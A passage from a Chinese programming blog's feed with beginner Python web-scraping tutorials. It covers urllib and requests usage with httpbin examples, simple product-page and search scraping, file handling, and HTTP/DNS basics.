response.read()print(html)</code></pre><p>携带data参数打开网页</p><pre><code># 携带data参数打开网页from urllib.parse import urlencodefrom urllib.request import urlopendata = bytes(urlencode({&#39;word&#39;: &#39;hello&#39;}), encoding=&#39;utf8&#39;)response = urlopen(&#39;http://httpbin.org/post&#39;, data=data)print(response.read().decode(&#39;utf-8&#39;))</code></pre><p>携带timeout参数打开网页1</p><pre><code>#  携带timeout参数打开网页1from urllib.request import urlopen# response = urllib.request.urlopen(&#39;http://httpbin.org/get&#39;, timeout=0.1)response = urlopen(&#39;http://httpbin.org/get&#39;, timeout=1)print(response.read())</code></pre><p>携带timeout参数打开网页2</p><pre><code># 携带timeout参数打开网页2from urllib.request import urlopentry:    response = urlopen(&#39;http://httpbin.org/get&#39;, timeout=0.1)    print(response.read())except Exception as e:    print(e)</code></pre><p>通过构建Request打开网页1</p><pre><code># 通过构建Request打开网页1from urllib.request import Requestfrom urllib.request import urlopenrequest = Request(&#39;https://python.org&#39;)response = urlopen(request)print(response.read().decode(&#39;utf-8&#39;))</code></pre><p>通过构建Request打开网页2</p><pre><code># 通过构建Request打开网页2from urllib.request import Requestfrom urllib.request import urlopenfrom urllib.parse import urlencodeurl = &#39;http://httpbin.org/post&#39;headers = {    &#39;User-Agent&#39;: &#39;Mozilla/4.0(compatibe;MSIE 5.5;Windows NT)&#39;,    &#39;Host&#39;: &#39;httpbin.org&#39;}dict = {&#39;name&#39;: &#39;Germey&#39;}data = bytes(urlencode(dict), encoding=&#39;utf8&#39;)req = Request(url=url, data=data, headers=headers, method=&#39;POST&#39;)response = urlopen(req)print(response.read().decode(&#39;utf-8&#39;))</code></pre><p>与通过构建Request打开网页2对比</p><pre><code># 与通过构建Request打开网页2对比from urllib.request import Requestfrom urllib.request import urlopenreq = Request(url=url, data=data, method=&#39;POST&#39;)response = urlopen(req)print(response.read().decode(&#39;utf-8&#39;))</code></pre><p>通过构建Request打开网页3：通过add_header方</p><pre><code># 通过构建Request打开网页3：通过add_header方法添加headersfrom urllib.request import Requestfrom urllib.request import urlopenfrom urllib.parse import urlencodeurl = &#39;http://httpbin.org/post&#39;dict = {&#39;name&#39;: &#39;Germey&#39;}data = bytes(urlencode(dict), encoding=&#39;utf8&#39;)req = Request(url=url, data=data, method=&#39;POST&#39;)req.add_header(&#39;User-Agent&#39;, &#39;Mozilla/4.0(compatibe;MSIE 5.5;Windows NT)&#39;)response = urlopen(req)print(response.read().decode(&#39;utf-8&#39;))</code></pre><p>urlencode()的使用</p><pre><code># urlencode()的使用from urllib.parse import urlencodefrom urllib.request import urlopendata = {&#39;first&#39;: &#39;true&#39;, &#39;pn&#39;: 1, &#39;kd&#39;: &#39;Python&#39;}data = urlencode(data).encode(&#39;utf-8&#39;)datapage = urlopen(req, data=data).read()page</code></pre><p>使用代理打开网页</p><pre><code># 使用代理from urllib.error import URLErrorfrom urllib.request import ProxyHandler, build_openerproxy_handler = ProxyHandler({&#39;http&#39;: &#39;106.56.102.140:8070&#39;})opener = build_opener(proxy_handler)try:    response = opener.open(&#39;http://www.baidu.com/&#39;)    print(response.read().decode(&#39;utf-8&#39;))except URLError as e:    print(e.reason)</code></pre><h1 id="二、requests"><a href="#二、requests" class="headerlink" title="二、requests"></a>二、requests</h1><p>相比较urllib模块，requests模块要简单很多，但是需要单独安装：</p><ul><li>在windows系统下只需要在命令行输入命令 pip install requests 即可安装。</li><li>在 linux 系统下，只需要输入命令 sudo pip install requests ，即可安装。</li></ul><p>requests库的八个主要方法</p><table><thead><tr><th>方法</th><th>描述</th></tr></thead><tbody><tr><td>requests.request()</td><td>构造一个请求，支持以下各种方法</td></tr><tr><td>requests.get()</td><td>向html网页提交get请求的方法</td></tr><tr><td>requests.post()</td><td>向html网页提交post请求的方法</td></tr><tr><td>requests.head()</td><td>获取html头部信息的主要方法</td></tr><tr><td>requests.put()</td><td>向html网页提交put请求的方法</td></tr><tr><td>requests.options()</td><td>向html网页提交options请求的方法</td></tr><tr><td>requests.patch()</td><td>向html网页提交局部修改的请求</td></tr><tr><td>requests.delete()</td><td>向html网页提交删除的请求</td></tr></tbody></table><p>请求之后，服务器通过response返回数据，response具体参数如下图：</p><table><thead><tr><th>属性</th><th>描述</th></tr></thead><tbody><tr><td>r.status_code</td><td>http请求的返回状态，若为200则表示请求成功</td></tr><tr><td>r.text</td><td>http响应内容的字符串形式，即返回的页面内容</td></tr><tr><td>r.encoding</td><td>从http header 中猜测的相应内容编码方式</td></tr><tr><td>r.apparent_encoding</td><td>从内容中分析出的响应内容编码方式（备选编码方式）</td></tr><tr><td>r.content</td><td>http响应内容的二进制形式</td></tr></tbody></table><h3 id="requests-request-method-url-kwargs"><a href="#requests-request-method-url-kwargs" class="headerlink" title="requests.request(method, url, **kwargs)"></a>requests.request(method, url, **kwargs)</h3><ul><li>method：即 get、post、head、put、options、patch、delete</li><li>url：即请求的网址</li><li>**kwargs：控制访问的参数，具体参数如下：</li><li><ul><li>params：字典或字节序列，作为参数增加到url中。使用这个参数可以把一些键值对以?key1=value1&amp;key2=value2的模式增加到url中</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 paramsimport requestspayload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, params=payload)print(r.url)# result: http://httpbin.org/get?key1=value1&amp;key2=value2print(r.text)# result:# {#   &quot;args&quot;: {#     &quot;key1&quot;: &quot;value1&quot;, #     &quot;key2&quot;: &quot;value2&quot;#   }, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;#   }, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/get?key1=value1&amp;key2=value2&quot;# }</code></pre><ul><li><ul><li>data：字典，字节序或文件对象，重点作为向服务器提供或提交资源是提交，作为request的内容，与params不同的是，data提交的数据并不放在url链接里， 而是放在url链接对应位置的地方作为数据来存储。它也可以接受一个字符串对象。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 dataimport requestspayload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, data=payload)print(r.url)# result: http://httpbin.org/postprint(r.text)# result:# {#   &quot;args&quot;: {}, #   &quot;data&quot;: &quot;&quot;, #   &quot;files&quot;: {}, #   &quot;form&quot;: {#     &quot;key1&quot;: &quot;value1&quot;, #     &quot;key2&quot;: &quot;value2&quot;#   }, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Content-Length&quot;: &quot;23&quot;, #     &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;#   }, #   &quot;json&quot;: null, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/post&quot;# }</code></pre><ul><li><ul><li>json：json格式的数据， json合适在相关的html，http相关的web开发中非常常见， 也是http最经常使用的数据格式， 他是作为内容部分可以向服务器提交。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 jsonimport requestspayload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, json=payload)print(r.url)# result: http://httpbin.org/postprint(r.text)# result:# {#   &quot;args&quot;: {}, #   &quot;data&quot;: &quot;{\&quot;key1\&quot;: \&quot;value1\&quot;, \&quot;key2\&quot;: \&quot;value2\&quot;}&quot;, #   &quot;files&quot;: {}, #   &quot;form&quot;: {}, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Content-Length&quot;: &quot;36&quot;, #     &quot;Content-Type&quot;: &quot;application/json&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;#   }, #   &quot;json&quot;: {#     &quot;key1&quot;: &quot;value1&quot;, #     &quot;key2&quot;: &quot;value2&quot;#   }, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/post&quot;# }</code></pre><ul><li><ul><li>files：字典， 是用来向服务器传输文件时使用的字段。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 fileimport requests# filejiatao.txt 文件的内容是文本“www.baidu.com www.cctvjiatao.com”files = {&#39;file&#39;: open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;rb&quot;)}r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, files=files)print(r.url)# result: http://httpbin.org/postprint(r.text)# result:# {#   &quot;args&quot;: {}, #   &quot;data&quot;: &quot;&quot;, #   &quot;files&quot;: {#     &quot;file&quot;: &quot;www.baidu.com www.cctvjiatao.com&quot;#   }, #   &quot;form&quot;: {}, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Content-Length&quot;: &quot;182&quot;, #     &quot;Content-Type&quot;: &quot;multipart/form-data; boundary=ee12ea6a4fd2b8a3318566775f2b268f&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;#   }, #   &quot;json&quot;: null, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/post&quot;# }</code></pre><ul><li><ul><li>headers：字典是http的相关语，对应了向某个url访问时所发起的http的头字段， 可以用这个字段来定义http的访问的http头，可以用来模拟任何我们想模拟的浏览器来对url发起访问。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 headersimport requestspayload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;}r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, params=payload, headers=headers)print(r.url)# result: http://httpbin.org/get?key1=value1&amp;key2=value2print(r.text)# result:# {#   &quot;args&quot;: {#     &quot;key1&quot;: &quot;value1&quot;, #     &quot;key2&quot;: &quot;value2&quot;#   }, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;#   }, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/get?key1=value1&amp;key2=value2&quot;# }</code></pre><ul><li><ul><li>cookies：字典或CookieJar，指的是从http中解析cookie</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 cookiesimport requestscookies = dict(cookies_are=&#39;working&#39;)r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/cookies&#39;, cookies=cookies)print(r.url)# result: http://httpbin.org/cookiesprint(r.text)# result:# {#   &quot;cookies&quot;: {#     &quot;cookies_are&quot;: &quot;working&quot;#   }# }</code></pre><ul><li><ul><li>auth：元组，用来支持http认证功能</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 authimport requestscs_user = &#39;用户名&#39;cs_psw = &#39;密码&#39;r = requests.request(&#39;GET&#39;, &#39;https://api.github.com&#39;, auth=(cs_user, cs_psw))print(r.url)# result: 待补充print(r.text)# result: 待补充</code></pre><ul><li><ul><li>timeout: 用于设定超时时间， 单位为秒，当发起一个get请求时可以设置一个timeout时间， 如果在timeout时间内请求内容没有返回， 将产生一个timeout的异常。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 timeoutimport requestsr = requests.request(&#39;GET&#39;, &#39;http://github.com&#39;, timeout=0.001)print(r.url)# result: 报错 socket.timeout: timed out</code></pre><ul><li><ul><li>proxies：字典， 用来设置访问代理服务器。</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 proxiesimport requestsproxies = {    &#39;https&#39;: &#39;http://41.118.132.69:4433&#39;}# 也可以通过环境变量设置代理# export HTTP_PROXY=&#39;http://10.10.1.10:3128&#39;# export HTTPS_PROXY=&#39;http://10.10.1.10:1080&#39;r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, proxies=proxies)print(r.url)# result: http://httpbin.org/getprint(r.text)# result:# {#   &quot;args&quot;: {}, #   &quot;headers&quot;: {#     &quot;Accept&quot;: &quot;*/*&quot;, #     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, #     &quot;Connection&quot;: &quot;close&quot;, #     &quot;Host&quot;: &quot;httpbin.org&quot;, #     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;#   }, #   &quot;origin&quot;: &quot;1.203.183.95&quot;, #   &quot;url&quot;: &quot;http://httpbin.org/get&quot;# }</code></pre><ul><li><ul><li>verify：开关， 用于认证SSL证书， 默认为True</li></ul></li></ul><pre><code>## request(method, url, **kwargs)，当 **kwargs 为 verify，SSL证书验证import requestsr = requests.request(&#39;GET&#39;, &#39;https://kyfw.12306.cn/otn/&#39;, verify=True)print(r.text)r = requests.request(&#39;GET&#39;, &#39;https://kyfw.12306.cn/otn/&#39;, verify=False)print(r.text)r = requests.request(&#39;GET&#39;, &#39;https://github.com&#39;, verify=True)print(r.text)</code></pre><ul><li><ul><li>allow_redirects: 开关， 表示是否允许对url进行重定向， 默认为True。</li></ul></li><li><ul><li>stream: 开关， 指是否对获取内容进行立即下载， 默认为True。</li></ul></li><li><ul><li>cert： 用于设置保存本地SSL证书路径</li></ul></li></ul><h3 id="requests-get-url-params-None-kwargs"><a href="#requests-get-url-params-None-kwargs" class="headerlink" title="requests.get(url, params=None, **kwargs)"></a>requests.get(url, params=None, **kwargs)</h3><pre><code># 官方文档def get(url, params=None, **kwargs):    kwargs.setdefault(&#39;allow_redirects&#39;, True)    return request(&#39;get&#39;, url, params=params, **kwargs)</code></pre><h3 id="requests-post-url-data-None-json-None-kwargs"><a href="#requests-post-url-data-None-json-None-kwargs" class="headerlink" title="requests.post(url, data=None, json=None, **kwargs)"></a>requests.post(url, data=None, json=None, **kwargs)</h3><pre><code># 官方文档def post(url, data=None, json=None, **kwargs):    return request(&#39;post&#39;, url, data=data, json=json, **kwargs)</code></pre><h3 id="requests-head-url-kwargs"><a href="#requests-head-url-kwargs" class="headerlink" title="requests.head(url, **kwargs)"></a>requests.head(url, **kwargs)</h3><pre><code># 官方文档def head(url, **kwargs):    kwargs.setdefault(&#39;allow_redirects&#39;, False)    return request(&#39;head&#39;, url, **kwargs)</code></pre><h3 id="requests-options-url-kwargs"><a href="#requests-options-url-kwargs" class="headerlink" title="requests.options(url, **kwargs)"></a>requests.options(url, **kwargs)</h3><pre><code># 官方文档def options(url, **kwargs):    kwargs.setdefault(&#39;allow_redirects&#39;, True)    return request(&#39;options&#39;, url, **kwargs)</code></pre><h3 id="requests-put-url-data-None-kwargs"><a href="#requests-put-url-data-None-kwargs" class="headerlink" title="requests.put(url, data=None, **kwargs)"></a>requests.put(url, data=None, **kwargs)</h3><pre><code># 官方文档def put(url, data=None, **kwargs):    return request(&#39;put&#39;, url, data=data, **kwargs)</code></pre><h3 id="requests-patch-url-data-None-kwargs"><a href="#requests-patch-url-data-None-kwargs" class="headerlink" title="requests.patch(url, data=None, **kwargs)"></a>requests.patch(url, data=None, **kwargs)</h3><pre><code># 官方文档def patch(url, data=None, **kwargs):    return request(&#39;patch&#39;, url, data=data, **kwargs)</code></pre><blockquote><p>requests.patch和request.put类似。<br> 两者不同的是： 当我们用patch时仅需要提交需要修改的字段。<br> 而用put时，必须将所有字段一起提交到url，未提交字段将会被删除。<br> patch的好处是：节省网络带宽。</p></blockquote><h3 id="requests-delete-url-kwargs"><a href="#requests-delete-url-kwargs" class="headerlink" title="requests.delete(url, **kwargs)"></a>requests.delete(url, **kwargs)</h3><pre><code># 官方文档def delete(url, **kwargs):    return request(&#39;delete&#39;, url, **kwargs)</code></pre><h3 id="requests库的异常"><a href="#requests库的异常" class="headerlink" title="requests库的异常"></a>requests库的异常</h3><p>注意requests库有时会产生异常，比如网络连接错误、http错误异常、重定向异常、请求url超时异常等等。所以我们需要判断r.status_codes是否是200，在这里我们怎么样去捕捉异常呢？<br> 这里我们可以利用r.raise_for_status() 语句去捕捉异常，该语句在方法内部判断r.status_code是否等于200，如果不等于，则抛出异常。<br> 于是在这里我们有一个爬取网页的通用代码框架</p><pre><code>try:    r = requests.get(url, timeout=30)  # 请求超时时间为30秒    r.raise_for_status()  # 如果状态不是200，则引发异常    r.encoding = r.apparent_encoding  # 配置编码    print(r.text)except:    print(&quot;产生异常&quot;)</code></pre><h1 id="三、requests的综合小实例"><a href="#三、requests的综合小实例" class="headerlink" title="三、requests的综合小实例"></a>三、requests的综合小实例</h1><h3 id="实例一：京东商品信息的爬取"><a href="#实例一：京东商品信息的爬取" class="headerlink" title="实例一：京东商品信息的爬取"></a>实例一：京东商品信息的爬取</h3><pre><code>## 京东商品信息的爬取# 不需要对头部做任何修改，即可爬网页import requestsurl = &#39;http://item.jd.com/2967929.html&#39;try:    r = requests.get(url, timeout=30)    r.raise_for_status()    r.encoding = r.apparent_encoding    print(r.text[:1000])  # 部分信息except:    print(&quot;失败&quot;)</code></pre><h3 id="实例二：亚马逊商品信息的爬取"><a href="#实例二：亚马逊商品信息的爬取" class="headerlink" title="实例二：亚马逊商品信息的爬取"></a>实例二：亚马逊商品信息的爬取</h3><pre><code>## 亚马逊商品信息的爬取# 该网页中对爬虫进行的爬取做了限制，因此我们需要伪装自己为浏览器发出的请求import requestsurl = &#39;http://www.amazon.cn/gp/product/B01M8L5Z3Y&#39;try:    kv = {&#39;user_agent&#39;: &#39;Mozilla/5.0&#39;}    r = requests.get(url, headers=kv)  # 改变自己的请求数据    r.raise_for_status()    r.encoding = r.apparent_encoding    print(r.text[1000:2000])  # 部分信息except:    print(&quot;失败&quot;)</code></pre><h3 id="实例三：百度搜索关键字提交"><a href="#实例三：百度搜索关键字提交" class="headerlink" title="实例三：百度搜索关键字提交"></a>实例三：百度搜索关键字提交</h3><pre><code>## 百度搜索关键字提交# 百度的关键字接口：https://www.baidu.com/s?wd=keywordimport requestskeyword = &#39;python&#39;try:    kv = {&#39;wd&#39;: keyword}    headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;}    r = requests.get(&#39;https://www.baidu.com/s&#39;, params=kv, headers=headers)    r.raise_for_status()    r.encoding = r.apparent_encoding    # print(len(r.text))    print(r.text)except:    print(&quot;失败&quot;)</code></pre><h3 id="实例四：网络图片的爬取"><a href="#实例四：网络图片的爬取" class="headerlink" title="实例四：网络图片的爬取"></a>实例四：网络图片的爬取</h3><pre><code>## 网络图片的爬取import requestsimport ostry:    url = &quot;https://odonohz90.qnssl.com/library/145456/bb0b3faa7a872d012bb4c57256b47585.jpg?imageView2/2/w/1000/h/1000/q/75&quot;  # 图片地址    root = r&quot;D:\DataguruPyhton\PythonSpider\lesson3\pic\\&quot;    path = root + url.split(&quot;/&quot;)[-1]    if not path.endswith(&quot;.jpg&quot;):        path += &quot;.jpg&quot;    if not os.path.exists(root):  # 目录不存在创建目录        os.mkdir(root)    if not os.path.exists(path):  # 文件不存在则下载        r = requests.get(url)        f = open(path, &quot;wb&quot;)        f.write(r.content)        f.close()        print(&quot;文件下载成功&quot;)    else:        print(&quot;文件已经存在&quot;)except:    print(&quot;获取失败&quot;)</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> requests </tag>
            
            <tag> urllib </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之二：环境部署、基础语法、文件操作</title>
      <link href="/Coderzgh.github.io/2019/05/12/python-crawler-basic-oper-2/"/>
      <url>/Coderzgh.github.io/2019/05/12/python-crawler-basic-oper-2/</url>
      
        <content type="html"><![CDATA[<h1 id="一、Python的环境部署"><a href="#一、Python的环境部署" class="headerlink" title="一、Python的环境部署"></a>一、Python的环境部署</h1><p>Python安装、Python的IDE安装本文不再赘述，网上有很多教程</p><p>爬虫必备的几个库：Requests、Selenium、lxml、Beatiful Soup</p><ul><li>Requests 是基于urllib编写的第三方扩展库，是采用Apache2 Licensed开源协议的HTTP库</li><li>Selenium是一个自动化测试工具，利用它我们可以驱动浏览器执行特定的动作，如点击、下拉等操作。对于一些JavaScript渲染的页面来说，这种抓取方式非常有效。</li><li>lxml是Python的一个解析库，支持HTML和XML的解析，支持XPath解析方式，而且解析效率非常高</li><li>Beatiful Soup是Python的一个HTML或XML的解析库，我们可以用它来方便地从网页中提取数据</li></ul><h1 id="二、Python的基础语法"><a href="#二、Python的基础语法" class="headerlink" title="二、Python的基础语法"></a>二、Python的基础语法</h1><p>可参考我的《趣学Python——教孩子学编程》系列笔记</p><p><a href="https://www.jianshu.com/p/69b5c9ee926e" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第1-3章</a></p><p><a href="https://www.jianshu.com/p/00850c80f78f" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第4-6章</a></p><p><a href="https://www.jianshu.com/p/90d50cc592ed" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第7-8章</a></p><p><a href="https://www.jianshu.com/p/885cb1fa9827" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第9-10章</a></p><p><a href="https://www.jianshu.com/p/48715dcb524a" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第11-12章</a></p><p><a href="https://www.jianshu.com/p/c9850ca89b60" target="_blank" rel="noopener">《趣学Python——教孩子学编程》学习笔记第13章</a></p><h1 id="三、Python文件的读取与输出"><a href="#三、Python文件的读取与输出" class="headerlink" title="三、Python文件的读取与输出"></a>三、Python文件的读取与输出</h1><p>键盘输入</p><pre><code># 键盘输入（python3将raw_input和input进行了整合，只有input）str = input(&quot;Please enter:&quot;)print(&quot;你输入的内容是：&quot;, str)</code></pre><p>打开文件</p><pre><code># 打开一个文件fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;wb&quot;)print(&quot;文件名：&quot;, fo.name)print(&quot;是否已关闭：&quot;, fo.closed)print(&quot;访问模式：&quot;, fo.mode)</code></pre><p>关闭文件</p><pre><code># 关闭一个文件fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;wb&quot;)fo.close()print(&quot;是否已关闭：&quot;, fo.closed)</code></pre><p>写入文件内容</p><pre><code># 写入文件内容fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)fo.write(&quot;www.baidu.com www.cctvjiatao.com&quot;)fo.flush()fo.close()</code></pre><p>读取文件内容</p><pre><code>fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)str = fo.read(11)print(&quot;读取的字符串是：&quot;, str)fo.close()</code></pre><p>查找当前位置</p><pre><code># 查找当前位置fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)str = fo.read(11)position = fo.tell()print(&quot;当前读取的位置是：&quot;, position)# result: 当前文件位置： 11fo.close()</code></pre><p>文件指针重定位</p><pre><code># 文件指针重定位fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)str = fo.read(11)print(&quot;读取的字符串1：&quot;, str)# result: 重新读取的字符串1： www.baidu.cposition = fo.tell()print(&quot;当前文件位置：&quot;, position)# result: 当前文件位置： 11str = fo.read(11)print(&quot;读取的字符串2：&quot;, str)# result: 读取的字符串2： om www.cctvpostion = fo.seek(0, 0)str = fo.read(11)print(&quot;读取的字符串3：&quot;, str)# result: 读取的字符串3： www.baidu.cfo.close()</code></pre><p>文件重命名</p><pre><code># 文件重命名 filejiatao.txt——&gt;filejiatao2.txtimport ossrc_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;dst_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao2.txt&quot;os.rename(src_file, dst_file)</code></pre><p>删除文件</p><pre><code># 删除一个文件import osdirty_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao2.txt&quot;os.remove(dirty_file)</code></pre><p> 异常处理1</p><p><img src="https:////upload-images.jianshu.io/upload_images/2255795-71be88200641b051.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/627" alt="img"></p><p>2-1.jpg</p><pre><code># 异常处理1try:    fh = open(&quot;testfile.txt&quot;, &quot;w&quot;)    fh.write(&quot;this is my test file for exception handing!&quot;)except IOError:    print(&quot;Eorror:can\&#39;t find file or read data&quot;)else:    print(&quot;witten content in the file successfully&quot;)    fh.close()</code></pre><p>异常处理2</p><pre><code># 异常处理2try:    fh = open(&quot;testfile.txt&quot;, &quot;w&quot;)    fh.write(&quot;this is my test file for exception handing!&quot;)finally:    print(&quot;Eorror:I don\&#39;t kown why ...&quot;)</code></pre><p>异常处理3</p><pre><code># 异常处理3def temp_convert(var):    try:        return int(var)    # except ValueError,Argument:    #     print(&quot;The argument does not contain numbers\n&quot;,Argument)    except (ValueError) as Argument:        print(&quot;The argument does not contain numbers\n&quot;, Argument)temp_convert(&quot;xyz&quot;)</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python网络爬虫实战之一：网络爬虫理论基础</title>
      <link href="/Coderzgh.github.io/2019/05/11/python-crawler-basic-internet-1/"/>
      <url>/Coderzgh.github.io/2019/05/11/python-crawler-basic-internet-1/</url>
      
        <content type="html"><![CDATA[<h1 id="一、浏览网页的基本过程和通信基础"><a href="#一、浏览网页的基本过程和通信基础" class="headerlink" title="一、浏览网页的基本过程和通信基础"></a>一、浏览网页的基本过程和通信基础</h1><blockquote><p>当我们在浏览器地址栏输入： <a href="http://www.baidu.com" target="_blank" rel="noopener">http://www.baidu.com</a> 回车后会浏览器显示百度的首页，那这 段网络通信过程中到底发生了什么？</p></blockquote><p>简单来说这段过程发生了以下四个步骤：</p><ol><li>浏览器通过DNS服务器查找域名对应的IP地址;</li><li>向IP地址对应的Web服务器发送请求 ;</li><li>Web Web服务器响应请求，发回HTML页面 ;</li><li>浏览器解析HTML内容，并显示出来</li></ol><h3 id="DNS"><a href="#DNS" class="headerlink" title="DNS"></a>DNS</h3><ul><li>DNS 是计算机域名系统 (Domain Name System (Domain Name System 或 Domain Name Service) 的缩写，由解析器和域名服务组成的。</li><li>域名服务器是指保存有该网络中所主机的和对应 IP 地址，并具有将域名转换为 IP 地址功能的服务器。</li><li>一般个域名的DNS解析时间在10~60毫秒之间。</li><li>一个域名必须对应IP地址，而一个IP地址不一定会有域名</li></ul><h3 id="HTTP和HTTPS"><a href="#HTTP和HTTPS" class="headerlink" title="HTTP和HTTPS"></a>HTTP和HTTPS</h3><ul><li>HTTP协议（HyperText Transfer Protocol，超文本传输协议）是一种发布和接收HTML页面的方法</li><li>HTTPS协议（HyperText Transfer Protocol over Secure Socket Layer）简单的讲就是HTTP的安全版，在HTTP下加入SSL层</li><li>SSL（Secure Socket Layer 安全套接层）主要用于Web的安全传输协议，在传输层对网络连接进行加密，保障在Internet上数据传输的安全</li><li>HTTP的端口号是80，HTTPS的端口号是443</li></ul><h3 id="URI与URL"><a href="#URI与URL" class="headerlink" title="URI与URL"></a>URI与URL</h3><ul><li>URI（Uniform Resource Identifier）统一资源标志符</li><li>URL（Universal Resource Locator）统一资源定位符，用于完整地描述Internet上网页和其他资源的地址的一中标识方法</li><li>URL的基本格式：<a href="scheme://host[:port]/path/.../[?query-string][#anchor]" target="_blank" rel="noopener">scheme://host[:port]/path/.../[?query-string][#anchor]</a> </li></ul><h3 id="请求"><a href="#请求" class="headerlink" title="请求"></a>请求</h3><p>请求由客户端向服务端发出，分为四部分：请求方法、请求的网址、请求头、请求体</p><ul><li>请求方法</li></ul><p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-fe7eace52135769d.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/751" alt="img"></p><p>  1-1.jpg</p><ul><li>请求头，用来说明服务器使用的附加信息，比较重要的信息有Cookie、Referer、user-Agent等。</li></ul><p>  <img 